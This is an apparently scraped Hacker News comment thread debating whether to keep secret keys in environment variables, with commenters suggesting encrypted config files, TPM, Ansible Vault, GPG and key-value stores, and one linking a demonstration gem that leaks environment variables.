You could still store your secret keys in ENV but encrypt them. Only your program has the method to decrypt them so in the case of an ImageMagick sub process it would access only your encrypted secret key with no knowledge to decrypt it.

Same thing while debugging : only the encrypted key is printed.

tezza 12 hours ago 1 reply      
Isn't this what TPM was designed to avoid ?

Neither files nor env variables.

Most chipsets have a rather unused TPM function, and it should be possible to have developers and processes hook into that.

Perhaps using tmptool ? On master process startup ask user for passphrase, and use that to query the TPM stored values ?


flavor8 10 hours ago 2 replies      
I typically store the env _name_ in the environment, and then use that in my apps to build a path to the file containing secrets (e.g. /etc/{mycompany}/{environment}/myapp.conf). The file is locked down by ACLs or permissions.
dagi3d 13 hours ago 0 replies      
we are in a similar situation and there is another approach I'd like to research. In order to have a distributed properties I was considering using something like consul[1] or etcd[2] which have some control access and load the required variables from upstart scripts

[1] https://www.consul.io/

[2] https://github.com/coreos/etcd

sritrisna 12 hours ago 1 reply      
Ansible has a neat feature, called Ansible Vault, which lets you encrypt sensitive files. This in combination with dotenv-deployment works pretty well for our Rails Apps. The only thing Im worried about is someone gaining unauthorised access to our serves and thus being able to read all the credentials stored inside the .env file especially the username & password to our externally hosted db. Probably the only way to prevent this would be to properly secure your server and the use of an IDS? Anyone has any experience with someone hacking their servers and successfully preventing e.g. a db dump? In this particular case, how easy would it be to stop attackers in their tracks?
sujeetsr 7 hours ago 1 reply      
Ok I'm confused by 'environment variable' vs files. How does one set an environment variable without putting it in a file on the particular server. Or by 'file' in this article (and the 12 factor one) do they mean a file that in source control?
moe 8 hours ago 1 reply      
1. It's easy to grab the whole environment and print it out (can be useful for debugging) or send it as part of an error report for instance.

If you have software in your deployment that will send "error reports" to untrusted third parties then you have bigger problems than your shell environment.

2. The whole environment is passed down to child processes

If you don't trust your child processes then you have bigger problems than your shell environment.

3. External developers are not necessarily aware that your environment contains secret keys.


I'm not sure what you mean by "external developer" and what you expect them to do with your environment. E-Mail it out when an error occurs?

If you tolerate that kind of developer on your project then you.. oh well, see above.

grhmc 9 hours ago 0 replies      
Clearing your environment variables after reading them, and only passing the ENVs required to perform the new task are pretty basic security measures. This was pretty common practice in the 90's, and then I was hoping that would be one of the lessons out of ShellShock.
gopalv 13 hours ago 0 replies      
I got bit by env vars a few years back, but due to performance issues in getenv() and ended up writing a whole bunch of PHP magic to ship config files safely and fast.

With pecl/hidef, I can hook a bunch of text .ini files into the PHP engine and defines constants as each requests comes in.

Originally, it was written for a nearly static website, which was spending a ridiculous amount of time defining constants, which rolled over every 30 minutes.

Plus those .ini files were only readable to root, which reads it and then forks off the unprivileged processes.

But with the hidef.per_request_ini, I could hook that into the Apache2 vhost settings, so that the exact same code would operate with different constants across vhosts without changing any code between them.

Used two different RPMs to push those two bits so that I could push code & critical config changes as a two-step process.

And with a bit of yum trickery (the yum-multiverse plugin), I could install two versions of code and one version of config, and other madness like that with the help of update-alternatives.

That served as an awesome A/B testing setup, to innoculate a new release with a fraction of users hitting a different vhost for the micro-service.

I'm rambling now, but the whole point is that you need per-request/per-user config overlay layers, for which env vars are horrible, slow and possibly printed everytime someone throws some diagnostics up.

jph 12 hours ago 1 reply      
We've had good success with distributing our secrets using a GPG-encrypted file that we put in /etc, not in the source code tree. We then use an ENV setting to point the app to the file. This gives us good flexibility (because one server can have multiple GPG files if we want, such as alpha/beta/gamma) and good encryption.
zamalek 13 hours ago 0 replies      
We had to migrate our software from single tenant (per machine) to multiple tenant for our cloud offering, on a 11 year old code base.

We used Michael's trick: environment variables pointing to config files works unbelievably well if you ever need to implement a multiple tenant cloud offering.

So apart from the security aspect, there's the aspect that it is a more versatile design.

iopq 4 hours ago 1 reply      
How do you suppose I do this in AWS where I have several auto-balanced servers? It kind of forces you to put it in environment variables.
greenleafjacob 12 hours ago 1 reply      
I wrote a library to handle mixed configuration values by using asymmetric RSA encryption [1].

[1]: https://github.com/jacobgreenleaf/greybox

astletron 10 hours ago 0 replies      
Please consider the environment before printing this config?
fartclops 6 hours ago 1 reply      
While I could simply tell you to blank out ENV vars once you've internalized them, I will instead write an infinitely long essay on how they are "considered harmful" that contributes absolutely nothing back to society.
klalle 13 hours ago 3 replies      
while i agree that storing api keys in the code repository is not the best idea, i am curious about the suggestion of moving it into chef configs.

wouldnt that, in turn, also be stored in a code repository, likely accessible in the same way as the main coe repo? then, this feels like a non-solution to me.

logicallee 10 hours ago 0 replies      
why not just split it up with an OTP, that you store in the code (or a file), then the other half in the environmental variable. combine in code (or include the file). seems like that would work. (you need both parts.)

I think this article is a response to people's practice of keeping API keys as an environmental variable so as to keep them off of the filesystem (or at least what git sees and checks in) so that they don't accidentally publish them, as happened in that article article where some gem he was using to respect .gitignore didn't work for some reason.

would this work as a solution?

tibbon 6 hours ago 0 replies      
I created a quick gem (which you shouldn't install) that demonstrates having some untrusted code in your app which will post all of your environmental variables to a 3rd party server: https://github.com/tibbon/env_danger

Now, of course no one would install and run this... but I could imagine someone accidentally typing the name of a Gem wrong, someone accepting a bad PR (a sub-dependancy perhaps even doing so?), etc and somehow something untrusted getting in there. Yes, that means you have other problems, but it isn't outside the realm of possibility that accidental access like this is had.

Just because it shouldn't happen, doesn't mean it will never happen.

       cached 2 January 2015 23:02:01 GMT